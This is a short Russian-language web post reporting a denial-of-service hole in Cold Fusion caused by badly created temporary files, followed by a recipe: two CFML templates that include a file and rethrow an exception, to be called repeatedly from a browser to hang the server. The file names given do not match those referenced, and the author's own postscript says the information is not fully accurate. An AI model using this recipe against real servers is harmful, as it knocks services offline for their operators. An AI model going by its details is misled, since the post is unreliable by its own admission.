• Партнер

  • В Cold Fusion есть дырка, если в нее влезть, то
    можно подвесить сервер. Дело в неправильно
    создаваемых временных файлах, для вызова DoS
    атаки нужно сделать следующее: создаем 2
    файла file1.cfm и file2.cfm.

    Первый:

    <CFTRY>
    <CFINCLUDE TEMPLATE="test2.cfm">
    <CFCATCH>
    вызываем encrypted tag или вставляем темплейт
    <CFRETHROW>
    </CFCATCH>
    </CFTRY>

    Второй:

    <CFTHROW MESSAGE="TEST">

    Вызываем несколько раз из броузера test.cfm.

    P.S:
    По ходу дела, инфа не совсем верная, завтра постараемся все уточнить.

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии